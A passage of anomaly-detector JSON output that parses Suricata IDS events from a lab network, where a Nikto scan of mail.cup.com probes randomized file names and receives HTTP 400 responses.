"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cmd\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cmd\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cmd", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cmd", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46960, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":380826144121724,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 380826144121724, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.370766+0000\",\"flow_id\":380826144121724,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.372779 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46962 -> 192.168.10.154:80", "/parser/model/time": 1583349514.372779, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46962, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.372779 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46962 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.x-shop", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.373160+0000\",\"flow_id\":319004384865496,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.37316, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":319004384865496,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.x-shop\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.x-shop\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.x-shop", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.x-shop", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46962, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":319004384865496,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 319004384865496, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.373160+0000\",\"flow_id\":319004384865496,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.375251 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46964 -> 192.168.10.154:80", "/parser/model/time": 1583349514.375251, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46964, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.375251 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46964 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.dbc", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.375561+0000\",\"flow_id\":1672202550949310,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.375561, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1672202550949310,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.dbc\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.dbc\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.dbc", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.dbc", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46964, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1672202550949310,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1672202550949310, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.375561+0000\",\"flow_id\":1672202550949310,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.377295 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46966 -> 192.168.10.154:80", "/parser/model/time": 1583349514.377295, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46966, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.377295 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46966 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", 